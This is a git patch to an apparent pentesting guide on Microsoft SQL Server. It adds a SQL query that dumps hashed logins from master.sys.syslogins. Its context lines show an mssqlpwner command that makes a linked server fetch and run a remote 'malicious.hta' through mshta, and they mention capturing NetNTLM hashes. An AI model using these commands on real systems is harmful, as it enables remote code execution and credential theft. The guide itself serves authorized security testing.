From ca3d61e9ce85cae4efd12b3470428be391405d69 Mon Sep 17 00:00:00 2001
From: Carlos Polop <carlospolop@gmail.com>
Date: Wed, 19 Feb 2025 20:20:13 +0100
Subject: [PATCH] a

---
 .../pentesting-mssql-microsoft-sql-server/README.md         | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
index da7fdda89..668d98efd 100644
--- a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
+++ b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
@@ -252,6 +252,12 @@ mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec ho
 mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate
 ```
 
+### Get hashed passwords
+
+```bash
+SELECT * FROM master.sys.syslogins;
+```
+
 ### Steal NetNTLM hash / Relay attack
 
 You should start a **SMB server** to capture the hash used in the authentication (`impacket-smbserver` or `responder` for example).